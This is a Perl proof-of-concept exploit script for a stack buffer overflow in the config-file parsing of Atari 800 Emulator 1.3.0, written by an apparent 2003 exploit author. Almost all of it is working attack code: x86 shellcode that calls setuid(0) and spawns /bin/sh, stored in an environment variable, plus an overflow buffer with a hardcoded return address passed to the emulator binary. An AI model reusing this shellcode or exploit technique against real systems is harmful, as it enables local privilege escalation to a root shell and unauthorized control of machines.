#!perl

########################################################
# PoC By OpTiKoOl, for Atari 800 Emulator, Version 1.3.0
# based on 
# http://www.securityfocus.com/archive/1/331518/2003-08-01/2003-08-07/0
# -
# This PoC exploits a bof in parsing a very long config file ( > 250 bytes )
# As in the advisory there's other bofs. but i just researched this one to
# make a Proof-Of-Concept Code. 
# In Gentoo Linux (distro where this poc was developed) there isn't any suid
# atari800 binaries. i suppose.. :D
# -
# Tested against Atari800 from portage.
# OpTiKoOl@syners.org & OpTiKoOl@psyfreakz.org
# -
# Big kiss to Neuza ;* ehehe The Buf Smashing The Stack! lol
# and a fucking shout to psychedelic ppl, you rockZ!
# Stay Fresh!

sub head {
print "#####################################################
# PoC against Atari 800 Emulator, Version 1.3.0
# by OpTiKoOl\@syners.org and OpTiKoOl\@psyfreakz.org
# 02/08/2003, CopyLeft by OpTiKoOl ...
# http://www.syners.org/ & http://psyfreakz.org/
# -
# Big Kiss 2 Neuza ;* Chuak! Chuak!
#\n";
}

# this sc was ripped from a fake (trojaned) exploit...
# but this is a real shellcode, so enjoy :D

$shellcode = 	"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" #setuid 0
	.	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
	.	"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
	.	"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

$buf = "SYNERSOWNZ" x 25;
$ENV{'SYNERS'} = $shellcode;
$buf .= "\xad\xff\xff\xbf";
&head;
exec("/usr/bin/atari800 -config $buf");